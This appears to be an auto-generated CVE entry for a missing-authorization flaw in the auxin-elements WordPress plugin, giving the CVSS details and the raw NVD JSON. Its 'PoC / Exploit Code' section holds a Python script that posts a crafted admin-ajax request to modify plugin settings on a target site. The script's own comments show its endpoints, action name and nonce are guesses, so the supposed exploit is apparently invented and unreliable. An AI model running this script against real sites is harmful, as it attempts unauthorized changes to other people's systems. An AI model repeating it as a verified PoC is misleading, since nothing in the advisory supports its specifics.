Security Vulnerability Report
中文
CVE-2025-69016 CVSS 4.3 MEDIUM

CVE-2025-69016

Published: 2025-12-30 11:16:00
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in averta Shortcodes and extra features for Phlox theme auxin-elements allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shortcodes and extra features for Phlox theme: from n/a through <= 2.17.15.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

auxin-elements (Shortcodes and extra features for Phlox theme) <= 2.17.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69016 PoC - Missing Authorization in auxin-elements plugin # Target: WordPress site with auxin-elements plugin <= 2.17.15 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-69016 This PoC attempts to access admin-level functionality as a low-privileged user """ target = target_url.rstrip('/') # Common auxin-elements endpoints that should require admin privileges vulnerable_endpoints = [ f"{target}/wp-admin/admin-ajax.php", f"{target}/wp-json/auxin/v1/" ] print(f"[*] Testing target: {target}") print(f"[*] CVE-2025-69016 - Missing Authorization in auxin-elements") # Test with low-privilege session (simulated) session = requests.Session() # Note: In real attack, attacker would use a low-privilege user account # and craft requests to admin-only functions # Example POST request that might exploit the vulnerability exploit_data = { 'action': 'auxin_shortcode_admin_action', 'nonce': 'attacker_provided_or_bypassed_nonce', 'sub_action': 'modify_settings' } print("[*] Sending exploit request...") try: response = session.post( vulnerable_endpoints[0], data=exploit_data, timeout=10 ) if response.status_code == 200: # Check if response indicates successful unauthorized access if 'success' in response.text or 'settings' in response.text.lower(): print("[!] VULNERABLE - Unauthorized access possible!") return True print("[*] Target may not be vulnerable or request failed") return False except requests.RequestException as e: print(f"[*] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = input("Enter target URL: ") check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69016", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:59.887", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in averta Shortcodes and extra features for Phlox theme auxin-elements allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shortcodes and extra features for Phlox theme: from n/a through <= 2.17.15."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/auxin-elements/vulnerability/wordpress-shortcodes-and-extra-features-for-phlox-theme-plugin-2-17-12-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}